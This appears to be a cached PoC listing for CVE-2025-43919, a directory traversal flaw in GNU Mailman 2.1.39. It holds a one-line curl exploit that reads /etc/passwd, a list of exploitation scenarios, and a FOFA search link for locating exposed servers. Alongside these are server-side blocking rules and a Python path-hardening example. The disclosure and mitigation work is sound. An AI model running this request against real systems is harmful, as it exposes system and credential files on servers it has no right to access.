POC details: 66e720ad17cc14d5b730ec0224cf22e54e8a28d7

Source
Related vulnerability
Title: GNU Mailman security vulnerability (CVE-2025-43919)
Description: GNU Mailman is free software from the GNU community in the United States for managing e-mail discussions and mailing lists. It integrates with web projects so that users can manage their subscription accounts conveniently, and it provides built-in archiving, automatic forwarding processing, content filtering and anti-spam filters. GNU Mailman 2.1.39 contains a security vulnerability caused by directory traversal, which may lead to arbitrary file reads.
Description
A new vulnerability has been discovered in GNU Mailman 2.1.39, bundled with cPanel/WHM, allowing unauthenticated remote attackers to read arbitrary files on the server via a directory traversal flaw.
Introduction
### 🚨 CVE-2025-43919: Directory Traversal in GNU Mailman 2.1.39 (cPanel/WHM)
> A new vulnerability has been discovered in GNU Mailman 2.1.39, bundled with cPanel/WHM, allowing unauthenticated remote attackers to read arbitrary files on the server via a directory traversal flaw.

📌 **Vulnerability Summary:**
- **Type**: `Directory Traversal` (Unauthenticated)
- **Component**: `private.py` CGI script
- **Affected Endpoint**: `/mailman/private/mailman`
- **Impact**: Disclosure of files such as `/etc/passwd`, `.mbox` archives, and Mailman configuration files
- **CVSS Score**: `5.8 (Medium)`
- **CVE ID**: `CVE-2025-43919`

Status: No official patch (Mailman 2.1.x is EOL)

🔥 Proof of Concept:
```
curl -X POST -d "username=../../../../etc/passwd&password=x&submit=Let+me+in..." \
http://target/mailman/private/mailman
```
🧨 Exploitation Scenarios:
- Dump `/etc/passwd`, `configs`, or `mailbox files`
- Leak credentials and sensitive archives
- Chain with other bugs for RCE or escalation

🛡️ Mitigations:
Block access to `/mailman/private` at the web server level:

```apache
<Location "/mailman/private">
    # Apache 2.4 (mod_authz_core): a lone "Require ip" grants only the listed
    # clients and implicitly denies everyone else. "Deny from all" is the
    # Apache 2.2 (mod_access_compat) form; mixing the two styles is unsupported.
    Require ip 127.0.0.1
</Location>
```
Or in Nginx:

```nginx
location /mailman/private {
    # "return" runs in the rewrite phase, before the access phase, so the
    # request is answered with 403 before "deny all" is evaluated; keeping
    # both is harmless and survives later edits that drop either line.
    deny all;
    return 403;
}
```
⬆️ Migrate to **Mailman 3.x**; 2.x is EOL and lacks modern protections
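The web-server rules above only hide the endpoint; the underlying defect class is a CGI script that builds a filesystem path from untrusted request input. The following Python snippet is an added example, not Mailman's code, showing the weak join pattern beside a hardened resolver that confines a requested list name to an archive root. `ARCHIVE_ROOT`, `LISTNAME_RE` and the function names are assumptions for illustration and do not reproduce Mailman's real layout.

```python
import os
import re

# Constructed root for this example; Mailman's real archive layout is not
# reproduced here.
ARCHIVE_ROOT = "/var/lib/mailman/archives/private"

# Hypothetical list-name policy: one path component, no separators, no
# leading dot, bounded length.
LISTNAME_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9_.-]{0,63}")


def weak_archive_path(listname: str) -> str:
    """Weak pattern: join untrusted input straight onto the root.

    '../' segments walk out of ARCHIVE_ROOT, and os.path.join discards the
    root entirely when listname is absolute (e.g. '/etc/passwd').
    """
    return os.path.join(ARCHIVE_ROOT, listname)


def escapes_root(path: str) -> bool:
    """True if the normalised path lies outside ARCHIVE_ROOT."""
    normalised = os.path.normpath(path)
    return os.path.commonpath([ARCHIVE_ROOT, normalised]) != ARCHIVE_ROOT


def safe_archive_path(listname: str) -> str:
    """Return the archive path for listname, or raise ValueError.

    Two independent checks: a strict allow-list on the name, then a
    containment check on the resulting path, so a gap in one does not
    silently become a file read.
    """
    if not LISTNAME_RE.fullmatch(listname):
        raise ValueError(f"rejected list name: {listname!r}")
    candidate = os.path.normpath(os.path.join(ARCHIVE_ROOT, listname))
    if escapes_root(candidate):
        raise ValueError(f"path escapes archive root: {candidate!r}")
    return candidate


def is_safe_listname(listname: str) -> bool:
    """Boolean wrapper around safe_archive_path for callers that only gate."""
    try:
        safe_archive_path(listname)
    except ValueError:
        return False
    return True


if __name__ == "__main__":
    # Constructed inputs: the PoC payload, an absolute path, and two normal names.
    for name in ("../../../../etc/passwd", "/etc/passwd", "mailman", "dev-list.2025"):
        weak = weak_archive_path(name)
        print(f"{name!r:28} weak-join escapes root: {escapes_root(weak)!s:5} "
              f"hardened accepts: {is_safe_listname(name)}")
```

The containment check uses `os.path.normpath` plus `os.path.commonpath`, which is purely lexical and therefore works even when the archive root does not exist on the machine running the check; on a live system a `realpath`-based check would additionally catch symlinks planted under the root.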

🔍 FOFA Query : [app="Mailman"](https://en.fofa.info/result?qbase64=YXBwPSJNYWlsbWFuIg%3D%3D)

📚 Learn more, share responsibly, and keep your infra secure.

🔒 Follow for more **real-world** CVEs, **PoCs**, and **hardening** tips:
👉 [@cybersecplayground](https://t.me/cybersecplayground)

`#bugbounty` `#infosec` `#exploit` `#pentest` `#cve2025` `#directorytraversal` `#linuxsecurity`

File snapshot

```
[4.0K] /data/pocs/66e720ad17cc14d5b730ec0224cf22e54e8a28d7
├── [1.3K] cve_2024_43919_poc.py
├── [1.1K] LICENSE
└── [1.7K] README.md

0 directories, 3 files
```
Cached for you by the Shenlong bot
Notes
    1. Accessing the PoC through the source is recommended.
    2. If the source is no longer available or cannot be reached, send an e-mail to f.jinxu#gmail.com to request a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.